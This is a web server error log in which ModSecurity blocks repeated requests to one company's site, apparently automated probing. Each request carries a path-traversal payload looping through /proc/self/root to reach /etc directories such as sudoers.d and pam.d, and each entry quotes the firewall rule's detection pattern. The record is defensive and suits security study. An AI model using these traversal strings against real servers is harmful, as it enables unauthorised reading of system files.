[Tue Mar 17 11:33:21.545657 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.243.203:55424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmMb-sgTmmJoPuMdyqZgAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:22.729692 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:55434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmMtCmCSWTlPouqorXmgAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:24.009668 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:55450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmNAeiSKl8TjouI-YNbwAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:26.763946 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.241.46:39368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmNq4xEDsg_V3ESNY-4gAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:33:27.596547 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.243.203:55462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmN5qmL8PQht4WJFlTvgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:28.911050 2026] [:error] [pid 1016:tid 140411599251200] [client 74.7.243.203:55464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmOJqmL8PQht4WJFlTwgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:30.073519 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:51982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmOjarLhPAjZGI1b255wAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:31.419155 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.243.203:51996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmO7-sgTmmJoPuMdyqagAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:32.598711 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.203:52008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmPNY0UrI5A3LftIzuJgAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:33.947474 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:52020] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmPQeiSKl8TjouI-YNcwAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:35.171235 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.203:52036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmP9Y0UrI5A3LftIzuKgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:36.537708 2026] [:error] [pid 9155:tid 140411733534464] [client 74.7.243.203:52038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmQNbI7zhHXcabyMUx2AAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:37.727010 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.203:52040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmQdY0UrI5A3LftIzuKwAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:39.047721 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.243.203:52044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmQ9bI7zhHXcabyMUx2QAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:40.192701 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.243.203:50998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmRL-sgTmmJoPuMdyqbgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:41.345855 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:51014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmRdCmCSWTlPouqorXnwAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:42.629797 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:51018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmRpqmL8PQht4WJFlT0AAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:43.907332 2026] [:error] [pid 9299:tid 140411599251200] [client 74.7.243.203:51032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmR7-sgTmmJoPuMdyqcQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:45.221649 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.243.203:51036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmSa4xEDsg_V3ESNY-5QAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:49.904969 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:51048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmTa4xEDsg_V3ESNY-6gAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:52.099490 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.203:57370] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmTweiSKl8TjouI-YNdgAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
